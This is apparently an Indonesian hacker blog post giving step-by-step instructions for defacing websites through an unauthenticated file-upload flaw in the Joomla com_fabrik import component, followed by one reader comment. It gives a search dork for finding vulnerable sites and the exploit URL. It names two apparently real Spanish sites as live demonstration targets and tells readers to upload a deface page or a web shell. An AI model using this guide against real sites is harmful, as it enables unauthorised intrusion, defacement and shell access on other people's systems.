Langsung aja :D
1. Dork : inurl:viewTable?cid= site:.com
Kembangin sendiri ya :)
2. Exploit : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Live demo : 1. sanmigueldeabona.es
2. hispabano.es
3. Cari target menggunakan dork
Misal : KLIK
jika ada tulisan "Sorry this from is not publiesed"
4. Masukan expolitnya : \hispabano.es/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
5. Upload script deface kalian, atau shell jika beruntung kilk import CSV
6. Jika masih tetap dihalaman Upload kalian, berarti berhasil
Jika dialihkan kehalaman blank putih yang hanya ada tempat upload berarti gagal
Coba cari target lain
Jika dialihkan kehalaman blank putih yang hanya ada tempat upload berarti gagal
Coba cari target lain
7. Untuk melihat hasil deface kalian, : http://targer.com/media/namafilekalian.html
Contoh klik : hispabano.es/media/banten.html
Sekian dan terimakasih :)
./Dayak_Cyb3r
gan kan udah di pasang scrip nya pas aku ketik
ReplyDeletehttp://webnya.com/media/namascripku.html
kok keluarnya 404 itu udah jadi apa belom ya